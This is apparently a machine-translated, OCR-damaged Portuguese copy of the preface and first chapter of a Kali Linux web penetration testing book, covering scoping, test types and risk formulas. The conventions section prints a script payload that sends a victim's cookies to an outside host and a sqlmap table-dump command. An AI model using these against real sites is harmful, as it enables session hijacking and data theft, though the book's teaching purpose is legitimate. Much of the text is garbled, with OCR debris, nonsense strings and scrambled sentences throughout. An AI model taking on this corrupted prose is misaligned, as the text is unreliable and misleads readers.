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Prefácio 


Kali é um arsenal Teste de Invasão baseado no Debian Linux usado por segurança 

profissionais (e outros) para realizar avaliações de segurança. Kali oferece uma 

variedade de conjuntos de ferramentas personalizadas para identificar e explorar 
vulnerabilidades em 

sistemas. Este livro é escrito ferramentas de alavancagem disponíveis em Kali Linux 

liberados 

têge encaram paras aplcacõe Eater NES para profissionais 
Testadores de penetração que procuram incluir Kali em uma penetração de aplicações web 
noivado. Nosso objetivo é identificar a melhor ferramenta de Kali (s) para uma tarefa específica, 
fornecer detalhes sobre como usar o aplicativo (s), e oferecem exemplos do que informações 
poderia ser obtida para fins de com base em experiência de campo especialista relatório. Kali tem 
vários programas e utilitários, no entanto, este livro vai concentrar-se na ferramenta mais forte (s) 
para uma tarefa específica no momento da publicação. 


Os capítulos deste livro são divididos em tarefas utilizados na aplicação web do mundo real 
Teste de Invasão. Capítulo 1, testes de penetração e de instalação, fornece uma visão geral 
Testes de Penetração conceitos básicos, estratégias de serviços profissionais, fundo 

sobre o meio ambiente Kali Linux, ea criação de Kali para temas apresentados neste livro. 
Capítulos 2-6, abrangem vários aplicativos web conceitos de testes de penetração, incluindo 
exemplos de configuração e relatórios destinados a destacar temas abordados se pode 
realizar seu objetivo desejado. 


Capítulo 7, contramedidas defensivas, serve como uma fonte de reparação em sistemas 
vulnerável a ataques apresentados nos capítulos anteriores. Capítulo 8, Teste de Penetração 
Relatório Executivo, oferece relatórios melhores práticas e exemplos que podem servir como 
modelos para a construção de relatórios de nível executivo. O objetivo de projetar o livro em 
desta forma é dar ao leitor um guia para envolver uma penetração de aplicações web 

com a ferramenta melhor possível (s) disponível em Kali, oferecer medidas para remediar uma 
vulnerabilidade 

e fornecer dados capturados como poderia ser apresentada de uma forma profissional. 


Prefácio 


O que este livro cobre 


Capítulo 1, testes de penetração e de instalação, abrange os fundamentos da construção de 
uma 

prática profissional Teste de Invasão. Os tópicos incluem a diferenciação de um 

Teste de Penetração de outros serviços, descrição da metodologia e direcionamento 
aplicações web. Este capítulo também fornece passos utilizados para configurar uma Kali 
Ambiente Linux para tarefas abordados neste livro. 


Capítulo 2, Reconhecimento, fornece várias maneiras de coletar informações sobre um 

alvo. Os tópicos incluem ferramentas gratuitas populares destacando disponíveis na Internet 
como 

bem como a recolha de informação utilitários disponíveis em Kali Linux. 


Capítulo 3, os ataques lado do servidor, centra-se na identificação e exploração de 
vulnerabilidades 

em servidores web e aplicações. Ferramentas cobertos estão disponíveis em Kali ou outro aberto 
utilitários de origem. 


Capítulo 4, Ataques lado do cliente, alvos hospeda sistemas. Os tópicos incluem a engenharia social, 
explorando vulnerabilidades do sistema host e atacando as senhas, pois são os mais 
meio comum para proteger os sistemas host. 


Capítulo 5, Atacar de autenticação, analisa a forma como os usuários e dispositivos para autenticar 
web 

aplicações. Os tópicos incluem a segmentação do processo de gerenciamento de sessões de 
autenticação, 

comprometer a forma como os dados são armazenados em sistemas host, e man-in-the-middle 


Fito -aleae a We erator copo tat co de senddores eR S- eye Scripting. 


procuração 
ataques, e colheita de senha. Este capítulo abrange igualmente os métodos para interromper 
serviços utilizando técnicas de negação de serviço. 


Capítulo 7, contramedidas defensivas, fornece as melhores práticas para o seu endurecimento 
aplicações web e servidores. Os tópicos incluem linhas de base de segurança, gerenciamento de 
patches, 

políticas de senha, e defender-se contra os métodos de ataque abordados no anterior 

capítulos. Este capítulo também inclui uma seção forense focados, pois é importante 

para investigar adequadamente um ativo comprometido para evitar impacto negativo adicional. 


Capítulo 8, Penetração Teste Relatório Executivo, abrange as melhores práticas para o 
desenvolvimento de 

Penetração pós relatórios de serviço de teste profissionais. Os tópicos incluem uma visão geral 
de métodos para agregar valor ao seu produto final, a formatação do documento e os modelos 
que pode ser usado para construir relatórios profissionais. 
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Prefácio 


O que você precisa para este livro 


Os leitores devem ter uma compreensão básica de aplicações web, networking 

conceitos e metodologia de testes de penetração. Este livro vai incluir detalhada 

exemplos de como executar um ataque usando ferramentas oferecidas em Kali Linux, bem como 
outras aplicações de código aberto. Não é necessário, mas benéfico ter experiência 

usando versões anteriores do Backtrack ou programas similares. 


Os requisitos de hardware para a construção de um ambiente de laboratório e criação da Kali 
Arsenal Linux são abordados em Capítulo 1, testes de penetração e de Instalação. 


Que este livro é para 


O público-alvo deste livro são testadores de penetração profissionais ou outros 

olhando para maximizar Kali Linux para um Teste de Invasão do servidor web ou aplicação 
exercício. Se você está procurando identificar como realizar um teste de penetração contra 
aplicações web e achados a um cliente é uma forma profissional, em seguida, 

este livro é para você. 


Convenções 


Neste livro, você vai encontrar uma série de estilos de texto que distinguem entre 
diferentes tipos de informação. Aqui estão alguns exemplos desses estilos, e um 
explicação do seu significado. 


Palavras de código no texto são apresentados da seguinte forma: "Por exemplo, você pode ligar 
para o perfil 

My First Scan ou qualquer outra coisa que você gostaria. " 

Um bloco de código é definido da seguinte 

forma: 


<script> document.write ("<img src = ‘http://kali.drchaos.com/var/www/xss _ 
laboratório / lab_script.php? "+ document.cookie +"> ") </ script> 


Qualquer entrada de linha de comando ou a saída é escrita da 

seguinte forma: 

SqlMap-u http://www .drchaous.com/article.php?id=5 -T-L tablesnamehere 
teste - despejo 


-U teste-dump 
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Prefácio 


Novos termos e palavras importantes são mostradas em negrito. As palavras que você vê na 
tela, em menus ou caixas de diálogo, por exemplo, aparecem no texto assim: "Em breve 
como nós, clique no Executar botão, nós recebemos uma injeção de SQL". 


Ro. é A E . 
>> Avisos ou notas importantes aparecem em uma caixa como esta. 


q D Dicas e truques aparecer assim. 
w 


Feedback do leitor 


O feedback dos nossos leitores é sempre bem-vindo. Deixe-nos saber o que você pensa 
Neste livro, o que você gostou ou não gostou pode ter. Feedback do leitor é importante para o 
nos a desenvolver títulos que você realmente tirar o máximo proveito de. 


Para nos enviar feedback geral, basta enviar um e-mail para feedback@packtpub.com, 
e mencionar o título do livro através do assunto da mensagem. 


Se existe um tema que você tem experiência em e você está interessado em qualquer escrita 
ou contribuir para um livro, consulte o nosso guia autor em www.packtpub.com / autores. 


Atendimento ao Cliente 


Agora que você é o orgulhoso proprietário de um livro Packt, temos uma série de coisas para 
ajudá-lo a obter o máximo de sua compra. 


Errata 


Embora tenhamos tomado todos os cuidados para garantir a exatidão dos nossos conteúdos, erros 
acontecem. Se você encontrar um erro em um dos nossos livros, talvez um erro no texto ou 

o código-ficaríamos muito gratos se você iria relatar isso para nós. Ao fazer isso, você pode 

salvar outros leitores de frustração e nos ajudar a melhorar as versões subsequentes deste 

livro. Se você encontrar qualquer errata, por favor informe-los visitando http://www.packtpub. 

com.br / submeter-errata, A seleção de seu livro, clicando no formulário de apresentação de errata link, 
e inserir os detalhes da sua errata. Uma vez que seu errata são verificados, a sua submissão 

Serão aceitos ea errata será carregado no nosso site, ou adicionado a qualquer lista de 

errata existente, sob a seção Errata desse título. Qualquer errata existente pode ser visto 
seleccionando o seu título de http:/Avww.packtpub.com/support. 
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Prefácio 


Pirataria 


A pirataria de material com direitos autorais na internet é um problema constante em todas as 
mídias. 

No Packt, tomamos a proteção de nossos direitos autorais e licenças muito a sério. Se você 
deparar com as cópias ilegais de nossos trabalhos, sob qualquer forma, na internet, por favor 
nos fornecer o endereço de localização ou nome do site imediatamente para que possamos 
buscar um remédio. 


Entre em contato conosco copyright@packtpub.com com um link para a suspeita 
material pirateado. 


Agradecemos a sua ajuda na proteção de nossos autores, e nossa capacidade de trazer 
você um conteúdo valioso. 


Perguntas 


Você pode contatar-nos em questions packtpub.com se você está tendo um problema 
com qualquer aspecto do livro, e nós faremos o nosso melhor para resolvê-lo. 
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Teste de Invasão 
e Configuração 


Muitas organizações oferecem serviços de segurança e de uso de termos tais como auditoria de 
segurança, 

rede ou avaliação de risco, e Penetration Test com significados sobrepostos. 

Por definição, uma auditoria é uma avaliação técnica mensurável de um sistema (s) ou 
aplicativo (s). As avaliações de segurança são as avaliações de risco, ou seja, Os serviços 
usado para identificar vulnerabilidades em sistemas, aplicações e processos. 


Teste de Invasão vai além de uma avaliação através da avaliação identificado 

vulnerabilidades para verificar se a vulnerabilidade é real ou um falso positivo. Por exemplo, 

uma auditoria ou uma avaliação pode utilizar ferramentas de verificação que fornecem algumas 
centenas 

possíveis vulnerabilidades em vários sistemas. Um teste de penetração tentaria 

para atacar essas vulnerabilidades da mesma maneira como um hacker malicioso para verificar 
quais vulnerabilidades são genuinos reduzir a lista verdadeira das vulnerabilidades do sistema para 
um punhado de falhas de segurança. Os Testes de Penetração mais eficazes são os que 

que visam um sistema muito específico, com um objetivo muito específico. Qualidade sobre a 
quantidade é 

o verdadeiro teste de um teste de penetração bem-sucedida. Enumerando um único sistema 
durante 

um ataque direcionado revela mais sobre a segurança do sistema e tempo de resposta para lidar 
com 

incidentes que ataque amplo espectro. Escolhendo cuidadosamente alvos valiosos, uma 
Verificador da penetração pode determinar toda a infra-estrutura de segurança e associado 

risco de ativo valioso. 


= 


é Ea 
Não O Teste de Invasão não tornar as redes mais seguras! 


Teste de Invasão e Configuração 


Esta é uma má interpretação comum e deve ser claramente explicado a todos os potenciais 
clientes. Teste de Invasão avalia a eficácia da segurança existente. Se 

um cliente não tem uma forte segurança, em seguida, eles vão receber pouco valor a partir de 
Serviços de testes de penetração. Como consultor, recomenda-se que a penetração 

Os serviços de análise são oferecidos como forma de verificar a segurança para os sistemas 
existentes, uma vez 

um cliente acredita que eles tenham esgotado todos os esforços para assegurar a esses sistemas e 
são 

pronto para avaliar se existem lacunas existentes na obtenção desses sistemas. 

Posicionando um escopo adequado de trabalho é fundamental quando a venda de serviços de testes 
de penetração. 

O escopo do trabalho define o que os sistemas e as aplicações estão a ser alvo, bem como 

o que conjuntos de ferramentas podem ser usadas para comprometer vulnerabilidades que são 
encontradas. Melhores práticas 

está a trabalhar com o seu cliente durante uma sessão de design para desenvolver um escopo 


E Ena BRENES AMRI LUP PaF asap. BackTrack- se uma 


s-on guia que ira pipet e passo-a-passo mé S para encontrar vulnerabilidades 
e exploração de aplicações web. Este livro vai cobrir alvos pesquisando, identificando 
e exploração de vulnerabilidades em aplicações web, bem como os clientes que usam web 
serviços de aplicação, defendendo aplicações web contra ataques comuns, e 
edifício Teste de Invasão os produtos para a prática de serviços profissionais. Nós 
acredito que este livro é Ótimo para quem está interessado em aprender como se tornar um 
Verificador da penetração, os usuários que são novos para Kali Linux e querem aprender as 
características 
e as diferenças de Kali contra BackTrack, e testadores de penetração experientes que podem 
precisa de uma reciclagem ou de referência sobre novas ferramentas e técnicas. 


Este capítulo vai quebrar os conceitos fundamentais por trás vários segurança 

serviços, bem como orientações para a construção de uma prática profissional Teste de Invasão. 
Conceitos incluem diferenciar um teste de penetração de outros serviços, a metodologia 

visão geral, e visando aplicações web. Este capítulo também fornece uma breve 

visão geral da criação de um teste de Kali Linux ou ambiente real. 


Teste de Invasão aplicação Web 
conceitos 


A aplicação web é qualquer aplicativo que usa um navegador web como um cliente. Esta lata 

ser um fórum de mensagens simples ou uma folha de cálculo muito complexo. As aplicações web 
são 

popular baseado na facilidade de acesso a serviços e gerenciamento centralizado de um sistema 
utilizado por vários partidos. Requisitos para acessar um aplicativo web pode seguir 

padrões de cliente navegador indústria simplificar as expectativas, tanto do 

prestadores de serviços, bem como os anfitriões acessar o aplicativo. 
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Capítulo 1 


As aplicações web são o tipo mais utilizado de aplicações dentro de qualquer 

organização. Eles são o padrão para a maioria das aplicações baseadas na Internet. Se você olhar 
em smartphones e tablets, você vai descobrir que a maioria das aplicações nesses dispositivos 
também são aplicações web. Isso criou uma superfície rica em alvo novo e grande para 
profissionais de segurança, bem como os atacantes exploram esses sistemas. 


Aplicações web de teste de penetração podem variar em escopo já que há um grande número 

de tipos de sistema e os casos de uso de negócios para serviços de aplicativos web. O núcleo da 
web 

camadas de aplicações que são servidores de hospedagem, dispositivos de acesso e depósito de 
dados 

deve ser testada, juntamente com a comunicação entre as camadas durante uma teia 


ercício Teste de Inyasão aplicação. x TES 
m exemplo para o desenvolvimento de um escopo para um teste de penetração de aplicações web 


é o teste 

aplicações de um servidor Linux de hospedagem para dispositivos móveis. O escopo do trabalho em 
um 

mínimo deve incluir a avaliação do servidor Linux (sistema operacional, rede 

configuração, e assim por diante), as aplicações alojadas no servidor, como os sistemas e 
usuários autenticados, dispositivos clientes que acessam o servidor ea comunicação entre 

todos os três níveis. Outras áreas de avaliação que podem ser incluídos no âmbito da 

trabalho são como os dispositivos são obtidos por funcionários, como os dispositivos são usados 
fora de 

acessar o aplicativo, a rede (s) circundante, a manutenção dos sistemas, 

e os usuários dos sistemas. Alguns exemplos de por que essas outras áreas de abrangência 
assunto está tendo o servidor Linux comprometida, permitindo conexão a partir de um 
dispositivo móvel infectado por outros meios ou a obtenção de um dispositivo móvel autorizado 


através dẹ mídias sociais para capturar informações confidenciais. ss f 
Nós incluímos modelos para definir o escopo de uma penetração de aplicações web em Capítulo 


8, Penetração Teste Relatório Executivo. Alguns exemplos Deliverable nesta oferta capítulo 
levantamentos checkbox que podem ajudar com andar um cliente através de possíveis alvos 

para uma aplicação web âmbito Teste de Invasão de trabalho. Cada escopo do trabalho deve 

ser personalizado em torno de objetivos de negócio do seu cliente, prazo esperado de 
desempenho, recursos alocados, e resultado desejado. Como afirmado anteriormente, os modelos 
servem como ferramentas para melhorar uma sessão de design para o desenvolvimento de um 
escopo de trabalho. 


Metodologia Teste de Invasão 


Há passos lógicos recomendados para a realização de um teste de penetração. O primeiro 
passo é identificar o status de iniciar o projeto. A terminologia mais comum 

definindo o estado de partida é Caixa-preta teste, Caixa branca teste, ou uma mistura 
entre branco e preto teste de caixa conhecido como Caixa cinza teste. 
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Teste de Invasão e Configuração 


Caixa preta assume o verificador da penetração não tem conhecimento prévio do alvo 

rede, os processos da empresa, ou serviços que fornece. Iniciando um projeto de caixa preta 
requer uma grande quantidade de reconhecimento e, tipicamente, é um acoplamento mais com 
base no 

conceito que os atacantes do mundo real podem passar longos períodos de tempo estudando alvos 
antes de lançar ataques. 


Como um profissional de segurança, encontramos testes de caixa preta apresenta alguns 
problemas quando 

escopo um teste de penetração. Dependendo do sistema e sua familiaridade com 

o meio ambiente, pode ser difícil estimar quanto tempo a fase de reconhecimento 

vai durar. Isso geralmente apresenta um problema de faturamento. Os clientes, na maioria dos 
casos, não são 

disposto a assinar um cheque em branco para você gastar tempo e recursos ilimitados em 

a fase de reconhecimento, no entanto, se você não passar o tempo necessário, em seguida, o seu 
Penetration Test acabou antes de começar. Também é irrealista porque um motivado 
atacante não terá, necessariamente, os mesmos de escopo e de faturamento restrições na 
Tester Penetração profissional. E por isso que recomendamos caixa cinza sobre 

Teste de caixa preta. 


Caixa branca é quando um verificador da penetração tem conhecimento íntimo sobre o sistema. 
Os objetivos do teste de penetração são claramente definidos e os resultados do relatório 

a partir do teste é normalmente esperado. O testador foi fornecido com detalhes sobre 

o alvo, tais como informações sobre a rede, o tipo de sistemas, processos da empresa, e 
serviços. Teste de caixa branca, tipicamente é focada em um objetivo de negócio específico 

, tais como a uma necessidade conformidade, em vez da avaliação genérico, e pode ser 

um engate mais curto, dependendo da forma como o espaço-alvo é limitado. Caixa branca 
atribuições poderia reduzir coleta de informações esforços, como reconhecimento 

serviços, igualando menos custos para os serviços de testes de penetração. 


[ GS Um grupo de seguranga interna geralmente executa teste de caixa branca. 


Teste de caixa cinza cai entre preto e teste de caixa branca. E quando a 

cliente ou sistema proprietário concorda que algumas informações desconhecido acabará 

ser descoberto durante uma fase de reconhecimento, mas permite que o verificador da penetração 
para pular esta parte. O verificador da penetração é fornecido alguns detalhes básicos do alvo; 

no entanto, funcionamento interno e algumas outras informações privilegiadas ainda é mantido 

do verificador da penetração. 
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Atacantes reais tendem a ter algumas informações sobre um alvo antes de se envolver 
o alvo. A maioria dos agressores (com exceção de script kiddies ou indivíduos 
download de ferramentas e executá-los) não escolhem alvos aleatórios. Eles são 
motivados e têm geralmente interagiram de alguma forma com o seu alvo antes de 
tentar um ataque. Caixa cinza é uma abordagem opção atraente para muitos segurança 
profissionais que realizam testes de penetração porque imita abordagens do mundo real 
utilizado por atacantes e se concentra em vulnerabilidades em vez de reconhecimento. 


O escopo do trabalho define a forma como os serviços de penetração será iniciado e executado. 

Ao inaugurar um compromisso de serviço Teste de Invasão deve incluir uma informação 

coleta de sessão usado para documentar o ambiente de destino e definir os limites 

da atribuição de evitar serviços desnecessários ou sistemas de reconhecimento de ataque 

que estão fora do escopo. Um escopo bem definido de trabalho vai economizar um prestador de 
serviços de 

aumento do escopo (definido como mudanças não controladas ou crescimento contínuo em um projeto 
de 

escopo), operar dentro dos prazos previstos e ajudar a fornecer mais precisa 

a entregar ao encerrar serviços. 

Atacantes de verdade não tem limites, tais como tempo, o financiamento, a ética, ou ferramentas 
significado 

que a limitação de âmbito Teste de Invasão pode não representar um cenário do mundo real. 

Em contraste com um alcance limitado, tendo um alcance ilimitado nunca pode avaliar crítica 
vulnerabilidades se um teste de penetração é concluído antes de atacar os sistemas desejados. 

Por exemplo, um verificador da penetração pode capturar as credenciais do usuário para sistemas 
críticos 

e concluir com acesso a esses sistemas sem testar o quão vulnerável os 

sistemas são a ataques baseados em rede. Também é importante incluir que está ciente de 

o teste de penetração como uma parte do escopo. Atacantes reais podem atacar a qualquer momento 


e 
PIQUIRI AIAPE OCRERAR ERIATEME IAS EFPESPYRO de trabalho para um teste de 
penetração são 
como se segue: 
e | Definição do sistema de destino (s): Isto especifica quais sistemas devem ser testados. 
Isto inclui a localização na rede, tipos de sistemas e uso comercial 
desses sistemas. 


e | Prazo do trabalho realizado: Quando o teste deve iniciar e que é 
o prazo previsto para atingir as metas especificadas. A melhor prática é não limitar 
o escopo de tempo para o horário comercial. 


e Como as metas são Avaliado: Que tipos de métodos de teste, tais como 
digitalização ou exploração não são permitidas e? Qual é o risco associado 
com os métodos de teste específicos permitidos? Qual é o impacto das metas que 
tornar-se inoperante devido a tentativas de penetração? Exemplos são; usando sociais 
rede, fingindo ser um funcionário, ataque de negação de serviço em chave 
sistemas, ou a execução de scripts em servidores vulneráveis. Alguns métodos de ataque 
pode representar um risco maior de sistemas prejudiciais do que outros. 
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Teste de Invasão e Configuração 


* Ferramentas e software: Quais as ferramentas e software são usados durante a penetração 
Teste? Isto é importante e um pouco controverso. Muitos profissionais de segurança 
Acredito que se eles divulgam suas ferramentas de que estará dando seu molho secreto. 
Acreditamos que este é apenas o caso quando os profissionais de segurança amplamente 
utilizado 
produtos comerciais disponíveis e são simplesmente rebranding relatórios enlatados de 
estes produtos. Profissionais de segurança experientes irão disponibilizar as ferramentas que 
são 
utilizado, e, em alguns casos, quando as vulnerabilidades são exploradas, documentação 
os comandos usados dentro das ferramentas para explorar uma vulnerabilidade. Isso faz com 
que o 
explorar recriados, e permite que o cliente realmente entender como o sistema 

* fRadompodifiminizseQdercutsidleientocadassterda byor? Eles estão informados 
antemão e capaz de preparar? E reação aos esforços de penetração parte 
o âmbito a ser testado? Se assim for, pode fazer sentido para não informar a segurança 
equipe de operações antes do teste de penetração. Isto é muito importante quando 
olhando para aplicações web que podem ser hospedados por outra parte, como um 
nuvem provedor de serviços que podem ser afetados a partir de seus serviços. 


e | Acesso Inicial Nível: Que tipo de informação eo acesso é fornecido 
antes de chutar fora o Teste de Invasão? O verificador da penetração têm 
acesso ao servidor via Internet e / ou Intranet? Que tipo de conta inicial 
nível de acesso é concedido? E este um preto, branco, cinza ou atribuição caixa para 
cada alvo? 


e Definição de Espaço Público-alvo: Este define as funções específicas de negócios 
incluído no teste de penetração. Por exemplo, a realização de um teste de penetração 
em uma aplicação web específico utilizado por vendas, enquanto não tocar em um diferente 
aplicativo hospedado no mesmo servidor. 


e Identificação de Areas de operação crítica: Definir sistemas que não deveria 
ser tocado para evitar um impacto negativo nos serviços de testes de penetração. 
E limites do servidor de autenticação ativo fora? E importante fazer crítica 
ativos clara antes de contratar um alvo. 


e Definição da Bandeira: É importante definir o quanto um Penetração 
Teste deve comprometer um sistema ou um processo. Caso os dados sejam 
removidos 
a partir da rede ou que o intruso apenas obter um determinado nível de 
acesso não autorizado? 

e | Produto final: Que tipo de relatório final é esperado? Que metas faz o 
cliente especificar a ser realizado após o fechamento de um serviço Teste de Invasão 
acordo? Certifique-se que as metas não são uma duração limitada para evitar aumento do 
escopo i 
serviço do esperado. E qualquer um dos dados classificados ou designados para um 
determinado i 
grupo de pessoas? Como deve ser o relatório final ser entregue? E importante 
para entregar um relatório de exemplo ou atualizações periódicas para que não haja 
surpresas 
no relatório final. 
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* Expectativas de remediação: Você vulnerabilidades deverá ser documentado 
com possíveis itens de ação de remediação? Quem deve ser notificado se um sistema 
é inutilizada durante um exercício de Teste de Invasão? O que acontece 
se os dados confidenciais são detectados? A maioria dos serviços de testes de penetração 
não 
incluir remediação de problemas encontrados. 


Algumas definições de serviço que devem ser usados para definir o escopo de serviços são: 


e Auditoria de Segurança: Avaliando um nível de risco de uma aplicação do sistema ou contra 
um 
conjunto de normas ou linhas de base. As normas são regras obrigatórias, enquanto as 
linhas de base 
são o nível mínimo aceitável de segurança. Normas e linhas de base atingir 
consistência nas implementações de segurança e pode ser específico para as indústrias, 


reenslonirads PesRASPSe segurança serve para auditorias estão focados em passar uma 
auditoria oficial (por exemplo, se preparando para uma empresa ou um governo 

auditoria), ou provar os requisitos básicos são atendidas por um conjunto obrigatório de 
regulamentações (por exemplo a seguir os mandatos HIPAA e HITECH para 

proteger registros de saúde). E importante informar os potenciais clientes 

se os seus serviços de auditoria incluem qualquer nível de seguro ou proteção se uma 
auditoria 

não for bem sucedida depois de seus serviços. Também é fundamental para documentar o 
tipo 

de remediação incluído com serviços de auditoria (isto é, se você faria 

identificar um problema, oferecer um plano de ação de remediação ou corrigir o problema). 
Auditoria de conformidade é muito mais do que correr uma ferramenta de segurança. Ele se 
baseia 

pesadamente sobre os tipos padrão de relatórios e seguindo uma metodologia que 


Enade acata VARAA Segurança aos clientes uma falsa sensação de segurança 
dependendo do que normas ou linhas de base estão sendo auditados. A maioria das normas 
e linhas de base têm um processo de atualização muito tempo que não é capaz de manter-se 
com ; 

as rápidas mudanças nas ameaças encontradas no mundo cibernético de hoje. E 
ALTAMENTE 

recomendado para oferecer serviços de segurança para além das normas e linhas de base 
para 

elevar o nível de segurança para um nível aceitável de proteção para real 

ameaças. Serviços devem incluir o acompanhamento com os clientes para ajudar com 


remediação, juntamente com a elevar a fasquia para a segurança para além de qualquer 
ivaliagão de Vulnerabilidade: Este é o processo em que os dispositivos de rede, 


Alstamas aperacioa asa software de aplicação são verificados, a fim de identificar 

a presença de vulnerabilidades conhecidas e desconhecidas. A vulnerabilidade é uma 
lacuna, 

erro, ou fraqueza na forma como um sistema é projetado, usado e protegido. Quando 
uma vulnerabilidade é explorada, pode resultar em dar acesso não autorizado, 
escalada de privilégios, ao ativo, ou outros resultados de negação de serviço. 
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Avaliações de Vulnerabilidade tipicamente parar uma vez que uma vulnerabilidade é 
encontrada, 

o que significa que o verificador da penetração não executar um ataque contra 

a vulnerabilidade para verificar se ele é genuíno. A Avaliação de Vulnerabilidade 
entrega oferece risco potencial associado com todas as vulnerabilidades 

encontrado com possíveis medidas de remediação. Existem muitas soluções, tais como 
Kali Linux que pode ser usado para fazer a varredura em busca de vulnerabilidades com 
base no sistema / 

tipo de servidor, sistema operacional, portas abertas para a comunicação e outros 
significa. Avaliações de Vulnerabilidade pode ser branco, cinza, ou de caixa preta 


dependendo da natureza da tarefa. 
Scans de vulnerabilidade só são úteis se calcular o risco. A desvantagem de 


muitas auditorias de segurança é os resultados da verificação de vulnerabilidade que fazem 
auditorias de segurança 

mais espessa, sem fornecer qualquer valor real. Muitos scanners de vulnerabilidade 

ter falsos positivos ou identificar vulnerabilidades que não estão realmente lá. Eles 

fazer isso porque eles incorretamente identificar o sistema operacional ou está procurando 
específico 

patches para corrigir as vulnerabilidades, mas não olhando para os patches cumulativos 
(patches que 

conter várias manchas menores) ou revisões de software. Atribuindo risco para 
vulnerabilidades dá uma verdadeira definição e senso de quão vulnerável um sistema 

é. Em muitos casos, isso significa que os relatórios de vulnerabilidade através de 
(fogralivantasvão! quráterasaber o risco associado à vulnerabilidade e 

tersidegerradoqsala reduzir os riscos encontrados. Para fornecer o valor de custo, é 
importante entender como calcular o risco. 


Calculando risco 


É importante entender como calcular o risco associado com vulnerabilidades 

encontrado, de modo que uma decisão pode ser feito sobre a forma de reagir. A maioria dos 
clientes olhar 

ao triângulo CISSP da CIA ao determinar o impacto do risco. CIA é o 

confidencialidade, integridade e disponibilidade de um determinado sistema ou aplicativo. 

Ao determinar o impacto do risco, os clientes devem olhar para cada componente 
individualmente, bem como a vulnerabilidade em sua totalidade para obter uma perspectiva 
verdadeira 

do risco e determinar a probabilidade de impacto. 

Cabe ao cliente decidir se o risco associado à vulnerabilidade encontrada justifica 

ou supera o custo de controles necessários para reduzir o risco a um nível aceitável. 

Um cliente pode não ser capaz de gastar um milhão de dólares em remediar uma ameaça que 
compromete impressoras de hóspedes, no entanto, eles serão muito disposto a gastar duas vezes 
mais 

tanto em sistemas com dados confidenciais da empresa protegendo. 
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O Certified Information Systems Security Professional (CISSP) Listas de currículo 
fórmulas para calcular o risco da seguinte forma. 


AExpectativa de perda única (LES) é o custo de uma simples perda de um Valor Patrimonial (AV). 
Fator de Exposição (EF) é o impacto da perda do activo vai ter a uma organização 

como a perda de receita devido a um servidor voltado para a Internet a ser encerrado. Clientes 
deve calcular a SLE de um ativo ao avaliar os investimentos de segurança para ajudar 

identificar o nível de financiamento que deve ser atribuído para controles. Se um SLE faria 

causar um milhão de dólares em danos para a empresa, não faria sentido considerar 

que no orçamento. 


A única fórmula expectativa de perda: 
SLE = AV * EF 


O próximo fórmula importante é identificar a frequência com que o LES pode ocorrer. Se um 
SLE vale um milhão de dólares poderia acontecer uma vez em um milhão de anos, como um 
meteoro 

caindo do céu, pode não valer a pena investir milhões em uma redoma de proteção 

em torno de seu quartel-general. Em contrapartida, se um incêndio pode causar um milhão de 
dólares 

de dano e é esperado a cada dois anos, seria aconselhável investir em um incêndio 

sistema de prevenção. O número de vezes que um ativo é perdido é cnamado de Taxa Anual de 
Ocorrência (ARO). 

O Expectativa de perda anual (ALE) é uma expressão da perda antecipada anual 

devido ao risco. Por exemplo, uma queda de meteoros tem uma baixa expectativa de anualizada 
(Uma vez em um milhão de anos), enquanto que um incêndio é muito mais provável e deve ser 
calculada em 

futuros investimentos para a proteção de um edifício. 


Anualizado fórmula expectativa de perda: 
ALE = SLE * ARO 


A pergunta final e importante a ser respondida é o risco associado a um ativo usado 
para descobrir o investimento para os controles. Isto pode determinar se, e quanto a 
cliente deve investir em remediar a vulnerabilidade encontrada em um ativo. 


Fórmula de risco: 


Risco = Valor Patrimonial * Ameaça * Vulnerabilidade * 

Impacto 

É comum que os clientes não têm valores para as variáveis em Gestão de Riscos 

fórmulas. Estas fórmulas servem como sistemas de orientação, para ajudar o cliente a melhor 
entender como eles devem investir em segurança. Nas minhas exemplos anteriores, utilizando a 
fórmulas com valores estimados para uma chuva de meteoros e fogo em um edifício, deve 
ajudar a explicar com valor em dólar estimada por um sistema de prevenção de incêndios é uma 
melhor 

investimento de cúpula de metal protegendo a queda de objetos. 
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Teste de Invasão é o método de atacar as vulnerabilidades do sistema de forma semelhante 
para ataques maliciosos reais. Normalmente, os serviços de testes de penetração são solicitados 
quando 

um sistema ou rede esgotou os investimentos em segurança e os clientes estão buscando 
verificar se todas as vias de segurança foram cobertas. Teste de Invasão pode ser preto, 

Branco ou caixa cinza, dependendo do escopo de trabalho acordado. 


A principal diferença entre a Avaliação de teste de penetração e vulnerabilidade é 

que um teste de penetração vai agir sobre vulnerabilidades encontradas e verificar se eles estão 
reduzindo reais da lista de risco associado confirmada com um alvo. A Vulnerabilidade 

Avaliação de um alvo pode mudar para um teste de penetração uma vez que o proprietário do ativo 
autorizou o prestador de serviços para executar ataques contra as vulnerabilidades 

identificado num alvo. Normalmente, os serviços de testes de penetração têm um custo mais elevado 
associado desde os serviços exigem recursos mais caros, ferramentas e tempo para 

completar tarefas com sucesso. Um equívoco popular é que a penetração 

Serviço de teste aumenta a segurança de TI pois os serviços têm um custo mais elevado associado 
de outros serviços de segurança: 


e O Teste de Invasão não tornar as redes de TI mais seguro, já que os serviços 

avaliar a segurança existente! Um cliente não deve considerar um Penetração 

Testar se há uma crença a meta não é completamente seguro. , 

Teste de Invasão pode causar um impacto negativo aos sistemas: E fundamental para 
ter autorização por escrito das autoridades competentes, antes de iniciar 

Um teste de penetração de um ativo pertence a outro partido. Não ter adequado 
autorização pode ser visto como pirataria ilegal pelas autoridades. Autorização 

deve incluir quem é responsável por quaisquer danos causados durante a penetração 
exercício, bem como quem deve ser contactado a fim de evitar futuros impactos negativos 
uma vez que um sistema é danificado. A melhor prática é alertar os clientes de toda a 
riscos potenciais associados com cada método usado para comprometer um alvo 

antes de executar o ataque para definir as expectativas de nível. Este é também um dos 
razões que recomendamos Teste de Invasão alvejado com um pequeno alcance. 

É mais fácil de ser muito mais metódico na sua abordagem. Como comum 

melhores práticas, recebemos a confirmação, que é um cenário de pior caso, que uma 
sistema pode ser restaurado por um cliente usando backups ou algum outro desastre 
método de recuperação. 


Teste de Penetração expectativas entregáveis devem ser bem definidos embora concordando 

em um escopo de trabalho. Os métodos mais comuns pelo qual hackers obtêm informações 

sobre as metas é através de engenharia social através de atacar as pessoas, em vez de sistemas. 
Exemplos está entrevistando para uma posição dentro da organização e saindo um 

semana depois com dados sensíveis oferecidos sem resistência. Este tipo de entrega maio 

não ser aceitável se um cliente está interessado em saber o quão vulnerável a web 

aplicações são para o ataque remoto. E também importante ter um objectivo final definido assim 
que todas as partes compreendam quando os serviços de penetração são considerados concluiu. 
Normalmente, uma entrega acordados serve esse propósito. 
